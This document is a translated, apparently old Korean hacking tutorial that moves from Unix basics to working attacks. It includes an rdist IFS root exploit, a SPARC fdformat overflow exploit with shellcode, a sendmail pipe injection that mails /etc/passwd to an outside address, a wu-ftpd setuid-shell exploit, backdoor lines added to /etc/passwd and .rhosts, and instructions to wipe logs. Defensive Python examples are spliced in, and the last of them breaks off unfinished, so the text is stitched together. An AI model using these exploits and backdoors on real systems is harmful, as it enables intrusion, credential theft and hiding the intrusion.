1. Before getting into practical hacking

Right. From here on we get into practice. The Internet and Unix material so far may have made your head hurt a little... Ah~ but those theories have to be the foundation before you can understand this material. Before getting into practice I will explain the terms you need to know and how to use Unix.. please follow along.

COME COME COME BABY!!
1.1 Understanding Unix

Hacking is practice. So I recommend that you install Linux on your own computer or, if you can, get an account somewhere and study Unix. If neither is an option, let me introduce a place where you can use Unix freely while learning hacking. (Unfortunately a few functions cannot be used there..) Those of you who already have an account or use Linux should have a look as well. Hackerslab - Hacking Free Zone [ http://www.hackerslab.org ]

For related matters, refer to the Hackerslab home page.
- Shell: the shell sits between the kernel and the commands. It is a kind of command interpreter that acts as an intermediary, interpreting the commands the user types and passing them on so that the kernel can process them.

- Process: a running program together with the information related to it.

- Login: because Unix is used by many people, you can only connect and use its resources once you know your own login name and password. It is the actual process of connecting to the computer.
Trying 255.255.255.254...
Connected to jungmin.org.
Escape character is '^]'.
SunOS 5.6
login: salsari          # login name - type salsari
Password:               # password (not echoed on the screen) - type the password
Last login: Fri Oct 8 19:17:37 from salsari.org
                        # if the password is right, you are logged in..
Sun Microsystems Inc.   SunOS 5.6       Generic August 1997
You have mail.
jungmin%                # the shell prompt is up. Connection complete.
- Logout: when you want to stop using the Unix system, the process of leaving it.

% ^d                    # Ctrl+d (some systems block Ctrl+d; on those, type logout.)
Connection closed by foreign host.

- The difference between bash and csh: when you log in, a shell prompt such as '$' or '%' appears; the former is bash (sh) and the latter is csh (tcsh). Both are used in much the same way, but there are small differences. To point one out simply, setting the path:

bash (sh) : export PATH=".:/bin:/usr/bin"
csh       : set path = (. /bin /usr/bin)
- The difference between System V and BSD Unix: like the bash/csh difference, there is nothing greatly different in how they are used. Each just has its own slightly different command set. Again, a quick look.

System V  (% : csh - run on Solaris)

% ps -ef
     UID   PID  PPID  C    STIME TTY      TIME CMD
    root     0     0  0   8월 05 ?        0:12 sched
    root     1     0  0   8월 05 ?        4:22 /etc/init -
    root     2     0  0   8월 05 ?        0:08 pageout
    root     3     0  1   8월 05 ?      648:44 fsflush
    root   482     1  0   8월 05 ?        0:00 /usr/lib/saf/sac -t 300
    root   401     1  0   8월 05 ?        0:00 /usr/lib/power/powerd
......

BSD  ($ : bash - run on Linux)

$ ps -aux
USER       PID %CPU %MEM  SIZE  RSS TTY STAT START   TIME COMMAND
bin        163  0.0  0.6   900  384 ?   S   Sep 14   0:00 portmap
news       362  0.0  1.8  1668 1160 ?   S   Sep 14   0:01 /usr/sbin/innd -p4 -r
news       377  0.0  0.4   872  280 ?   S   Sep 14   0:00 /usr/lib/news/bin/ove
news       403  0.0  0.9  1244  616 ?   S   Sep 14  18:05 sh /usr/lib/news/bin/
nobody   20717  0.0  1.0  1180  684 ?   S   17:05    0:00 httpd
......
- Permission: indicates who is allowed to access a file. Let's look at an example.

% ls -l                 # same function as dir in DOS
drwxr-xr-x   2 salsari  users    512 10월  8일 19:18 .
drwxr-xr-x 194 root     other   3584 10월  4일 10:57 ..
-rwx------   1 salsari  users      0 10월  8일 19:27 kkk
-rw-rw-rw-   1 salsari  users      8 10월  8일 19:22 kkk1
-rwxrwxrwx   1 salsari  users  29836 10월  8일 19:28 salsari.hwp

Character   Meaning         Mode value   Meaning
d           directory       400          User (owner) read (r)
r           read            200          User write (w)
w           write           100          User execute (x)
x           execute         040          Group read
-           not permitted   020          Group write
                            010          Group execute
                            004          Other read
                            002          Other write
                            001          Other execute
Now that you know the characters and the mode values, let's move on to understanding permissions. The total number of [-] positions is 10. (If you're not sure, count them. It is clearly 10 columns. ^^) Note that if the first column is [-] it is a regular file, and if it is [d] it is a directory.

The next 9 columns can be divided into three fields.

---/---/--- : taking [/] as the divider, the first field is the mode for user (the owner), the second for group, and the third for other (all other users).

Within each field, the first column is read (Read), the second is write (Write), and the third is execute (eXecution). According to the table above, the mode values are 4 for read (r), 2 for write (w), and 1 for execute (x).

I suspect that still doesn't quite make sense.. --; Let's look at a concrete example.

user read + user write + user execute + group read + other execute
r + w + x + r + x = rwxr----x
400 + 200 + 100 + 40 + 1 = 741

Got it now?... Be sure to remember it. Now shall we try reading some permissions?

drwxr-xr-x   2 salsari  users    512 10월  8일 19:18 .      # current directory
drwxr-xr-x 194 root     other   3584 10월  4일 10:57 ..     # parent directory

These are directories where the owner can read, write and execute, and the group and other users can only read and execute. [.] is the current directory and [..] the parent directory. (mode value 755)

-rwx------   1 salsari  users      0 10월  8일 19:27 kkk

Since it starts with [-] we can tell it is a regular file. It is -/rwx/---/---, so only the owner can read, write and execute it. (mode value 700)

-rw-rw-rw-   1 salsari  users      8 10월  8일 19:22 kkk1

A regular file; the owner, the group and other users can all read and write it. (mode value 666)

-rwxr-xr-x   1 salsari  users  29836 10월  8일 19:28 salsari.hwp

A regular file; the owner can read, write and execute it. The group and other users can only read and execute it.
- Set user id: while looking through files you will occasionally see something like '-rws--x--x', with an s shown in the user execute position. An s in the user execute position like this is called setuid (set user id), and it means that while the file is running it acts with the privileges of the file's user (owner). So what does a file like this mean?

Heh heh~~~ Look at the next example.

-r-sr-xr-x   3 root     root   88620 1999년 9월 15일 bash

The file name is bash... it must be a shell. The owner is root, and setuid is set... So running this file means anyone can get root's privileges.. Isn't that nice? Just run that one file and you become root.. quite a promotion...

Usually, after a hack, a shell is copied under a different name into a directory such as /usr/bin, setuid is set on it, and it is used as a backdoor.

Mode value   Meaning         Note
4000         Set user id
2000         Set group id
1000         Sticky bit      shared mode

The sticky bit is used a lot on the /tmp directory.

drwxrwxrwt   2 root     root     512 11월  8일 11:11 temp

As the example shows, anyone can create and delete files or directories in /tmp, but what you can actually delete is only the files and directories whose owner is you. (Heh.. too bad..) You can never delete files that other people have made. - That is why it is called shared mode..
- Redirection / pipe (|)

> file  : the output of the command goes into file.
>> file : the output of the command is appended to file.
< file  : the contents of file are used as the input.
<< kkk  : input stops when the string kkk appears.

> Things you should try yourself
% cat > kkk             # to finish input, type ^D (Ctrl + D).
% cat >> kkk
% cat < kkk

The pipe (|) acts as a kind of filter. file | file1 : the output of file is used as the input of file1.

> Worth running
% ps -ef | grep root

> Other Unix commands in detail are omitted.. ^^; (the feeble excuse of the one omitting them - study! Study!! (-.- )( -.-) )
 
1.2 Terms you need to know about hacking

bug : a critical problem inside source files.
hole : a bug or routine that can become the target of an attack.
packet : the basic unit of data communication, made by cutting data into pieces and attaching the various related information to them.
backdoor : a back door, a hole in the fence.
attack : attack, intrusion.
local host : the host you are currently using.
remote host : a host located somewhere outside.
vulnerability : a report that shows a security weakness in detail.
Advisory : a report that announces the problems and the fixes for various hackable bugs or routines.
Exploit : making use of a system security weakness.
1.3 Kinds of hacking

Hacking can be broadly divided into three approaches.

- Local attack: an attack by an intruder who has already got into the system through a remote attack and now tries to obtain root privileges. It makes use of bugs in the system's internal programs, environment variable manipulation, race conditions, and configuration mistakes made by the administrator.

- Remote attack: attacking from outside, using bugs in the target host's daemons, misconfiguration of NIS/NFS and the like, and information about users; the basic goal of the outside intruder is to obtain a shell on the target system.

- DOS (Denial of Service): a denial of service attack. Covered in detail later.
2. Local attack

Hmm.. where shall we start? Shall we look at rdist, which once made such a splash on SunOS? Let's take a look while referring to the advisory on the rdist bug published by 8lgm.

> Wait! Before that

So what exactly is the principle behind the rdist hack? (Remember that every hack has an underlying principle.) It is obtaining a root shell by manipulating the IFS environment variable. So..

- What is IFS? IFS stands for Internal Field Separator; it is the variable that defines the character used as the boundary when a string of input is split into words while running an external program.

By default IFS is defined as a space - IFS=" "

If you want to change IFS to a slash [/], in csh use setenv IFS / and in bash use export IFS="/". To help understand it, let's look at a simple example.
$ cat > pwd1            # create the file pwd1
#!/bin/sh               # shell script header. Uses bash (sh).
IFS="/"                 # define IFS as [/]
echo `pwd`              # show the output of pwd
^D                      # finish input and save
$ pwd                   # shows the current directory as an absolute path
/var/tmp
$ chmod 700 pwd1        # make the permissions executable
$ pwd1                  # run the shell script we made
var tmp                 # because IFS was set to [/], the path is split into the two fields var and tmp.
IFS acts as the separator for the words entered, so that home, fox, ... and so on are each recognized as a single word. Now let's look at the next example. Here you can see the security weakness of rdist.

% cat > distex
#!/bin/sh
IFS="/"
export PATH
/bin/sh
^D
% ./distex
distex: bin: not found  # shows the message that there is no executable called bin.
bin
Now, let's go through it step by step.

[8lgm]-Advisory-1.UNIX.rdist.23-Apr-1991   # 1991... truly a classic, isn't it?

rdist(1) uses popen(3) to execute sendmail(8) as root. It can therefore be made to execute arbitrary programs as root.

# The rdist program is used to distribute files to other systems.
# rdist has the environment variable IFS defined as '/'.
# While running, rdist uses popen(3) to execute /usr/lib/sendmail.
# IFS comes into play in functions such as exec() and popen().

Any user with access to rdist(1) can become root.   # so any user can become root using rdist..
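To make the advisory's one-line explanation concrete, here is an added example written for this page (not code from the tutorial or from 8lgm). It models the word splitting the pwd1 and distex scripts demonstrate, shows why a privileged program's popen("/usr/lib/sendmail ...") ends up looking for a command named usr when IFS is "/", and then shows the countermeasure that fixed this class of bug: the privileged program scrubs its environment (IFS, PATH, loader variables) before it calls popen() or system(). The variable lists, the constructed environment and the fake filesystem table are assumptions made for the illustration.

```python
# Added example (not from the original tutorial or the 8lgm advisory): a model
# of Bourne-shell word splitting on IFS, plus the environment sanitisation a
# privileged program should perform before popen()/system(). The constructed
# environment and the executables table below are assumptions.

DEFAULT_IFS = " \t\n"


def shell_split(command_line, ifs=DEFAULT_IFS):
    """Split a command line the way a Bourne shell splits words on IFS.

    Every character in ifs is a separator and empty words are dropped, which
    is exactly what the pwd1 script shows: '/var/tmp' with IFS='/' becomes
    ['var', 'tmp'].
    """
    words, current = [], ""
    for ch in command_line:
        if ch in ifs:
            if current:
                words.append(current)
            current = ""
        else:
            current += ch
    if current:
        words.append(current)
    return words


def resolve_command(command_line, ifs, path_entries, executables):
    """Return the program a shell would run for command_line, or None.

    The first word is the command name. A name containing '/' is used as is;
    anything else is looked up along path_entries. executables maps the
    paths that exist to True (a stand-in for the real filesystem).
    """
    words = shell_split(command_line, ifs)
    if not words:
        return None
    name = words[0]
    if "/" in name:
        return name if executables.get(name) else None
    for entry in path_entries:
        candidate = entry + "/" + name
        if executables.get(candidate):
            return candidate
    return None


UNSAFE_EXACT = {"IFS", "ENV", "BASH_ENV", "CDPATH"}   # shell start-up knobs
UNSAFE_PREFIXES = ("LD_",)                           # dynamic loader knobs
SAFE_PATH = "/usr/bin:/bin"


def sanitize_env(env):
    """Copy env minus the variables a caller could use to redirect a shell."""
    clean = {k: v for k, v in env.items()
             if k not in UNSAFE_EXACT and not k.startswith(UNSAFE_PREFIXES)}
    clean["PATH"] = SAFE_PATH    # never inherit '.' or user directories
    clean["IFS"] = DEFAULT_IFS   # set explicitly rather than leaving it unset
    return clean


def demo():
    """Resolve the advisory's sendmail command with and without sanitising."""
    # Constructed: the real sendmail exists, and the caller's current
    # directory happens to hold a file named 'usr'.
    executables = {"/usr/lib/sendmail": True, "./usr": True}
    inherited = {"PATH": ".:/usr/bin:/bin", "IFS": "/",
                 "HOME": "/home/salsari", "LD_PRELOAD": "/tmp/x.so"}
    with_inherited = resolve_command("/usr/lib/sendmail -t", inherited["IFS"],
                                     inherited["PATH"].split(":"), executables)
    clean = sanitize_env(inherited)
    with_clean = resolve_command("/usr/lib/sendmail -t", clean["IFS"],
                                 clean["PATH"].split(":"), executables)
    return with_inherited, with_clean, sorted(clean)
```

With the inherited environment the model resolves the command to ./usr, which is the whole bug; with the sanitised environment it resolves to /usr/lib/sendmail. Modern shells reset IFS at start-up and setuid-aware loaders ignore LD_* variables, but a privileged program should still not trust what it inherits: reset PATH and IFS, drop what it does not need, and pass absolute paths.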
# Create a distfile containing the following.
HOSTS = localhost
FILES = BullInTheHeather
${FILES} -> ${HOSTS}
install /tmp/1 ;
notify user ;

# Create the file usr.c containing the following.
main()
{
setuid(0);
chown("sh", 0, 0);
chmod("sh", 04755);
exit(0);
}

# From here on it is run mode.
> % cp /bin/sh .            # copy /bin/sh to the current directory (.)
> % cc -o usr usr.c         # compile usr.c
> % set path=(. $path)      # path - make the current directory the first path entry
> % setenv IFS /            # this is the C shell. Set IFS to /
> % rdist                   # run rdist
updating host localhost
rdist: BullInTheHeather: No such file or directory
notify @localhost ( user )
> % ls -l
-rwsr-xr-x  1 root    106496 Mar  4 00:25 sh
# Wow~ a root shell has been created in the current directory. Hack successful!! Root obtained!!
> % ./sh                    # run the shell

# (root shell)              # root privileges obtained
Well.. feeling proud? There will still be Unix servers on which this bug works. Where SunOS versions before 4.1.2 are in use and have not been patched, this bug will succeed. - Was it last year? There was a server where I got root with this bug... I can't quite remember which server it was now.. (Only last year! Against a careless administrator it works well enough. Nyahaha~)

Besides obtaining root by manipulating environment variables (Environment Variable) like this, race conditions (Race Condition) can also be exploited, and there are cases where a hole in security arises from a system administrator's mistake or misconfiguration. In such cases the administrator does not know about it either (he is bound to believe he did everything right..), so it can cause even bigger problems. (Usually when a bug appears, a patch that fixes it follows. But since the hole was created by the administrator's mistake, there is no chance of anything like a patch. - Administrators need to pay attention and be careful.) There is also the buffer overflow (Buffer Overflow), currently the biggest local attack method.
The race condition approach - frequently used against programs that create temporary files. In the process of creating a temporary file, writing to it and deleting it when the work is done, the race condition right before the write is used to put whatever content you want into whatever file you want.
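The temp-file race just described is easiest to understand when the window is simulated. The following is an added example written for this page, not code from the tutorial: in a throwaway directory it plays both halves of the race (a predictable temp name, then a symlink planted at that name before the write) against the pattern that defeats it (O_CREAT|O_EXCL|O_NOFOLLOW, or tempfile.mkstemp, which does the same with an unpredictable name). The function names, the prog.<pid> naming scheme and the sandbox contents are assumptions made for the illustration.

```python
import os
import stat
import tempfile

# Added example, not from the original tutorial: the temp-file race the text
# describes, reproduced in a sandbox directory, next to the file-creation
# pattern that refuses to write through a planted link. Names are hypothetical.


def unsafe_temp_path(directory, pid):
    """The predictable name many old programs used: <dir>/prog.<pid>."""
    return os.path.join(directory, "prog.%d" % pid)


def write_unsafely(path, data):
    """open(path, 'w') follows a symlink that appeared at path and truncates
    whatever it points to; this is the bug the text describes."""
    with open(path, "w") as f:
        f.write(data)


def write_safely(path, data):
    """Create with O_EXCL (fail if anything exists) and O_NOFOLLOW (never
    follow a link), with a private mode. Raises FileExistsError if the name
    was claimed before us instead of writing through it."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    try:
        os.write(fd, data.encode())
    finally:
        os.close(fd)


def write_with_mkstemp(directory, data):
    """The usual answer: unpredictable name plus O_EXCL, done by the library."""
    fd, path = tempfile.mkstemp(prefix="prog.", dir=directory)
    try:
        os.write(fd, data.encode())
    finally:
        os.close(fd)
    return path


def demo():
    """Simulate the race in a sandbox and report what each pattern did."""
    sandbox = tempfile.mkdtemp()
    victim = os.path.join(sandbox, "victim")
    with open(victim, "w") as f:
        f.write("original")
    # Constructed race: between 'the program chose a name' and 'the program
    # wrote', a symlink with that name was planted pointing at the victim.
    planted = unsafe_temp_path(sandbox, 1234)
    os.symlink(victim, planted)

    write_unsafely(planted, "temp data")
    with open(victim) as f:
        victim_after_unsafe = f.read()          # the victim was overwritten

    try:
        write_safely(planted, "temp data")
        safe_refused = False
    except FileExistsError:
        safe_refused = True                     # O_EXCL saw the planted name

    real = write_with_mkstemp(sandbox, "temp data")
    mkstemp_mode = stat.S_IMODE(os.stat(real).st_mode)
    return victim_after_unsafe, safe_refused, mkstemp_mode
```

demo() returns ("temp data", True, 0o600): the naive open wrote through the link and replaced the victim's contents, the O_EXCL open refused, and mkstemp produced a file only the owner can read. The sticky bit on /tmp described earlier limits who can delete a file, but it does nothing against a link planted under a name the program is about to use; that has to be handled at the open() call.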
Buffer overflow - the buffer overflow can be said to have begun with the attack on the finger daemon in the Morris Worm incident that shook the whole world in 1988. Because technical knowledge about it was lacking at the time, it was not well known, but after Aleph's article "Smashing the Stack for Fun and Profit" in Phrack magazine issue 49 in 1997 explained the principle of the buffer overflow and how to build one in detail, large numbers of buffer overflow attack methods have kept appearing to this day.

To look at the principle briefly: by overflowing the stack area of memory you change the address that is returned to, and thereby execute any arbitrary command you want.. (If I went through the original article in detail you might not be able to follow. Just know this much... - still, what I have just said is the core! The core!!)

This time shall we look at a program that causes a buffer overflow? fdformat is a utility used to format disks and PCMCIA memory cards. The bug arose because it does not check its arguments.
/* Solaris 2.5.1 - this exploited was compiled on Solaris2.4 and tested on 2.5.1 */
/* attack code for Solaris 2.4 through 2.5.1 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH 364
#define EXTRA 400
#define STACK_OFFSET 704
#define SPARC_NOP 0xa61cc013

/* This part is the shellcode, the core of obtaining the root shell. */
u_char sparc_shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
.............          /* two lines of shellcode deleted */
...................
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08";

u_long get_sp(void) {
    __asm__("mov %sp,%i0 \n");
}

void main(int argc, char *argv[]) {
    char buf[BUF_LENGTH + EXTRA + 8];
    long targ_addr;
    u_long *long_p;
    u_char *char_p;
    int i, code_length = strlen(sparc_shellcode), dso = 0;

    if (argc > 1) dso = atoi(argv[1]);
    long_p = (u_long *) buf;
    targ_addr = get_sp() - STACK_OFFSET - dso;
    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
        *long_p++ = SPARC_NOP;
    char_p = (u_char *) long_p;
    for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i];
    long_p = (u_long *) char_p;
    for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ = targ_addr;
    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
           targ_addr, BUF_LENGTH, EXTRA, STACK_OFFSET);
    execl("/bin/fdformat", "fdformat", &buf[1], (char *) 0);
    perror("execl failed");
}

# If you don't understand it, learn Unix programming.. (me too.. me too.. --;)
Simply compile and run it:

% gcc -o fdformat fdformat.c
% ./fdformat
.....
...
# whoami
root

If it has been patched it naturally won't work....

I'll wrap up the story on local attacks at about this point. Roughly.. "ah~ so that's how it's done.. that's the way they attack..." - know that much and move on.

3. Remote attack

You heard roughly about remote attacks above. Let's go straight into the attack~ charge!

- Sendmail bug: the representative player of remote attacks must be this Sendmail. Because the program is much bigger than others, it has correspondingly many bugs. (It has a great many local bugs too...)
This method is a bug that was popular a few years ago in sendmail version 4.1 on SunOS 4.1.x. Let's go through it slowly once again.

% telnet salsari.org 25         # telnet into the smtp port
Trying 255.255.255.255 ...
Connected to salsari.org.       # connected.
Escape character is '^]'        # if you want to get out, press Ctrl + ].
220 salsari.org Sendmail 4.1/SMI-4.1 ready at Wed, 6 Mar 99 01:59:21 KST   # check the sendmail version
mail from:"|/bin/mail salsari@hotmail.com < /etc/passwd"
                                # command to send the /etc/passwd file to salsari@hotmail - uses the pipe (|) bug
                                # in the from field, a command after a pipe can be executed.
250 "|/bin/mail salsari@hotmail.com < /etc/passwd"... Sender ok   # the daemon accepted the input.
rcpt to: root                   # recipient: root
250 root... Recipient ok        # the daemon says "got it"
data                            # write the message body
354 Enter mail, end with "." on a line by itself
babo...                         # babo... -_- (put in anything at all.)
.                               # typing . finishes the body.
250 Mail accepted
quit                            # get out.
221 salsari.org delivering mail
Connection closed by foreign host.
                                # the connection is closed; now you just wait for the password file to arrive in your e-mail.

Crack the password file obtained this way (if you're lucky you can get the root password too), log in locally, then get root using one of the countless local bugs.

Now let's look at a somewhat more recent bug, in wu-ftp version 2.4. With this bug the site exec command can be executed, so a root shell can be obtained easily.
COMMAND
  wu.ftpd(8)

SYSTEMS AFFECTED
  Sites running wuarchive ftpd versions prior to 2.3 or running "wrl" ftpd version ??

PROBLEM:        # the site exec command can run shell commands from ftp.

Compile program :       # attack source - write it and then compile it.
                        # compile : cc -o ftpbug ftpbug.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
main() {
seteuid (0);
system ("cp /bin/sh /tmp/.sh");
system ("chmod 6777 /tmp/.sh");
}

Login to the system :   # once compiled, connect by ftp
220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready.
Name (exploitablesys:root): goodaccount     # enter your own user name
331 Password required for goodaccount.
Password: (password)                        # enter the password
230 User goodaccount logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

See if system is exploitable :      # test whether the ftp bug exists.
ftp> quote "site exec bash -c id"   # when you enter this command...
200-bash -c id                      # the id command is run
200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users)
200 (end of 'bash -c id')           # if the result comes out like this, it is a target.

Exploit system :        # if the test succeeded, attack for real.
                        # running the attack code prepared earlier creates /tmp/.sh, a .sh file that gives root privileges.
ftp> quote "site exec bash -c /yer/home/dir/ftpbug"
200-bash -c /yer/home/dir/ftpbug
200 (end of 'bash -c /yer/home/dir/ftpbug')
ftp> quit               # it has been run, so now get out.
221 Goodbye.            # and then run /tmp/.sh!!!! From now on you are root!!!

We have looked at two examples of remote attacks, but both are holes created by misconfiguration. Apart from these there are buffer overflows caused by bugs in the daemons themselves. The representative one is the recent remote buffer overflow in the wu-ftp 2.4.2 versions.
4. Recent bugs

- linux
  Linux_INN - Red Hat Linux 6.0 INN vulnerability and countermeasures
  Linux_pop2d - pop2d vulnerability and countermeasures
  Linux super buffer overflow - super buffer overflow vulnerability and countermeasures
- sun / solaris
  SUN-automountd - SUN automountd vulnerability
  SUN-passwd - Sun passwd denial of service vulnerability and countermeasures
  Sun man/catman - Sun man/catman vulnerability and countermeasures
  Sun CDE - Sun CDE vulnerability and countermeasures
  SUN sdtcm_convert - sdtcm_convert vulnerability and countermeasures
  Solaris_libc - Solaris libc vulnerability and countermeasures
- HP/UX
  HP sendmail DOS - HP Sendmail DOS vulnerability and countermeasures
  HP_ftp - HP-UX ftp vulnerability and countermeasures
  HP CDE ttsession - HP CDE ttsession vulnerability and countermeasures
- AIX
  AIX Vulnerability in ptrace() system call - AIX ptrace() system call denial of service vulnerability
  AIX named-xfer security problem - AIX named-xfer security vulnerability and countermeasures
  AIX pdnsd buffer overflow - IBM AIX pdnsd buffer overflow vulnerability and countermeasures
- IRIX
  IRIX X server path - IRIX X server path vulnerability and countermeasures
  IRIX_midikeys - IRIX midikeys vulnerability and countermeasures
- DOS
  tcp-denial-of-service - TCP/IP denial of service vulnerability and countermeasures
  Using the Domain Name System DoS attack - denial of service (DoS) attack using the Domain Name System
- trojan / virus
  Trojan Tcp Wrapper - trojaned version of TCP Wrapper
  Melissa-Macro-Virus - Melissa macro virus
  CIH-Virus - CIH virus
- FTP
  FTP-buffer overflows - FTP buffer overflow vulnerabilities and countermeasures
  Remote buffer overflow in ftpd daemon.
    ProFTPD versions before 1.2.0pre1 are vulnerable
    All wu-ftpd versions up to 2.4.2 (beta 18) are vulnerable
    wu-ftpd VR series - versions before 2.4.2 (beta 18) VR10 are vulnerable
    BeroFTPD versions before 1.2.0 are vulnerable
    NcFTPd versions before 2.3.4 are vulnerable
  Crashing FTP Serv-U 2.5 - FTP Serv-U 2.5 vulnerability and countermeasures
- ETC
  lsof buffer overflow - lsof buffer overflow vulnerability and countermeasures
  umapfs - umapfs vulnerability and countermeasures
  cmsd-Buffer Overflow - Calendar Manager buffer overflow vulnerability and countermeasures
  Accelerated-X Overflow - Accelerated-X X server vulnerability and countermeasures
  Tiger vulnerability - Tiger vulnerability and countermeasures
  amd buffer overflow vulnerability - amd remote buffer overflow vulnerability and countermeasures
5. The hackers' hacking methodology

Above, you saw how root is obtained on a local host and how root is taken on a remote host. But those methods can be seen as extreme cases. So we need to look at what sequence hackers go through, and how they hack a system and take root.

5.1 Information gathering

First, if the system you use is A and the attack target is B, you will have to gather information related to B. Of course, if you have an account on B or know of one, the job becomes easier, but if not, you must get into B one way or another. (Because compared with remote bugs, local bugs are endless... and if you can become root through a remote bug, even better...) For that you check with things like finger, smtp, rusers and rpcinfo whether there is a usable account or whether the host has a remote bug. There are also remote bug scan programs that report bugs to you automatically; sscan and mscan are representative examples. And you also need to learn the administrator's pattern. At what times does he connect and work? Which login name (account) other than root does the administrator use? And how long is root's idle time? (The more idle time root has, the lazier the administrator managing the system can be assumed to be.)

Once you have gathered information about the system, you have to draw up a concrete plan.
5.2 Planning

Which way will you go?
- Does B have a remote bug that yields root, so you can become root directly?
- Will you get root on A first and use those root privileges to obtain an account on B?
- Does B have a weak account you can get in through?
- Will you crack a passwd file obtained through something like a cgi bug?

If you got in directly as root - matters related to removing the log information and installing a backdoor.

If you got in as a user
- Find a local bug on B. Then obtain root privileges.
- Remove the log information and install a backdoor so you can get back in easily.

Right, have you drawn up the plan and put it in order?

5.3 Remote attack

Carry out the remote attack. Whether it yields root or ordinary user privileges, first get into B!

5.4 Local attack

Take root with a local bug.

5.5 Removing traces

If you succeeded in getting in, and obtained root privileges, you will have left traces. If you look at the last command, /var/adm(log)/messages, /var/adm/utmp, /var/adm/wtmp and so on, traces will remain, and these traces must be deleted without anyone noticing and without any other change.

5.6 Installing a backdoor

Do you have to hack all over again to connect to system B once more? No. Isn't there such a thing as a backdoor? A backdoor is a way to get back into a system easily after it has been hacked. There are a great many kinds of backdoor. We will look at the details in 6.4.5.

5.7 And enjoy

Run around as you like. Try managing the administrators and play with it as if it were your own system. Only, do not do anything that damages the system. That is what crackers do. Play quietly, quietly, without anyone knowing. Don't forget...
6. Other hacking techniques

6.1 packet sniffing

A sniffer is a program that captures the packets travelling around a network. Its original purpose was network debugging, but just as a security tool is also a hacking tool, it quickly won the affection of hackers. On Ethernet, when host A sends a packet to host B, the packet is broadcast to the whole Ethernet segment. The host with the specified address picks the packet up, and the other hosts ignore it because it is not addressed to them. You probably get the rough idea now. What if those ignored packets were processed instead of ignored? That is where sniffing was born.

-- TCP/IP LOG -- TM: Tue Feb 15 17:04:55 -- PATH: salsari.org(1953) => jungmin.org(ftp)
STAT: Sun Apr 14 18:09:23, 14 pkts, 49 bytes [TH_FIN]
DATA:
: USER salsari
:
: PASS jungminlove
:
: CWD backup
:
: NLST
:
: QUIT
: --
6.2 Spoofing

- IP spoofing: the attack method of exploiting a flaw in the TCP/IP protocol to pose as the IP of a host in a trust relationship and get in is called IP spoofing. This flaw was mentioned in 1985 in Robert Morris's paper "A Weakness in the 4.2 BSD UNIX TCP/IP Software", and in 1995 the famous hacker Kevin Mitnick put the theory into practice and used it.

> A moment here!! R commands (rlogin, rsh, rcp)
These commands consult the contents of $HOME/.rhosts on the target system and access the home directory without any authentication. You could call them the very embodiment of the trust relationship.

- DNS spoofing: an attack in which the DNS server is knocked out with a DOS attack, DNS information is sent so that the target host, which authenticates by host name, trusts the hacker's host, and commands such as rlogin and rsh are then used.

- Web spoofing: a method of imitating the target web site on the Web and stealing information.

6.3 IP hijacking

Using redirection, one of the weaknesses of the TCP protocol, to watch an established connection between two hosts and then cut in in the middle is called hijacking. It can be used to get in by bypassing the protection mechanisms offered by one-time passwords such as S/KEY or ticket-based authentication systems such as Kerberos.
6.4 DOS

DOS (Denial Of Service) is the denial of service attack. Put simply, it is an attack that makes the services of the attacked host (ftp, smtp, telnet....) dumb so that they cannot do their job. Such an attack is of little use to us, but what if an Internet service provider (ISP) A is competing with a provider B? Naturally you would choose the provider whose service works well and is fast. So if a hacker hired by A takes down B's systems with DOS.. B's service would not work well.. users would have trouble.. and so users would flock to A rather than to B, whose service is not working. In the case of DOS the attacker often cannot be identified. (Because spoofing is used, it is hard to find out who is attacking the system with DOS.) Well.. that's the way it goes...

DOS attacks are countless: smurf, teardrop, ping flooding, syn flooding, mail bombs and so on.. They can merely stop a service from doing its job, but they can also wreck the whole system.
6.5 BackDoor

- Password backdoor

> Looking at the password file:
root:fVi3dx5Ytkdo:0:0:root:/:/bin/bash
salsari:mKbj4T1sYji:501:100:salsari:/home/salsari:/bin/bash

A password entry is divided into 7 fields.

user name : password : user ID : group ID : name : home directory : shell
root : fVi3dx5Ytkdo : 0 : 0 : root : / : /bin/bash

Oho~ easier than I thought.. You all.. get it? So shall we plant a backdoor in the password file?

Put the following into /etc/passwd.

$ echo "hacker::0:0:hacker:/:/bin/bash" >> /etc/passwd

If user ID:group ID is set to 0:0, it means the account has root's privileges. So the user hacker has root's privileges and can log in without a password...

A backdoor can be made this way too, but it is easily caught. So you can instead insert it somewhere in the middle of the password file, or change the user ID and group ID of a rarely used account to 0:0 and use that.

- .rhosts backdoor: Unix's rsh and rlogin commands consult the .rhosts file in the home directory. If you put + + into .rhosts, anyone can connect to the system without a password.

- setuid backdoor: as explained in chapter 2, a copy of the shell with setuid set is used as a backdoor.

-r-sr-xr-x   3 root     root   88620 1997년 7월 16일 /bin/hacker

The mode is changed, with root privileges, by chmod 4755 <filename>

- TCP shell backdoor: a backdoor that opens a shell port (TCP) in inetd.conf and the services file and is connected to there.

- UDP shell backdoor: firewalls do not block UDP packets because of the DNS service. A UDP shell backdoor made to use that point can pass straight through.

- Rootkit: a program that installs backdoor programs automatically.

- Kernel backdoor: the kernel itself is modified to make a backdoor. An advanced backdoor method; detection is almost impossible.
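The password-file and .rhosts backdoors above are the easiest of this list to check for, and the checks follow directly from the field layout the section explains. The following is an added example written for this page, not code from the tutorial: one function walks /etc/passwd-style lines and reports any UID 0 account other than root (including the "rarely used account changed to 0:0" variant), any empty password field, and any malformed entry; a second walks a .rhosts file and reports wildcard (+) trust or trust granted to a user other than the file's owner. The sample lines are constructed here from the entries shown in the text; the hypothetical usernames games and bob are assumptions. The setuid-shell variant is covered by the permission audit example earlier on the page.

```python
# Added example (not from the original tutorial): checks an administrator can
# run over /etc/passwd and ~/.rhosts for the backdoors this section describes.
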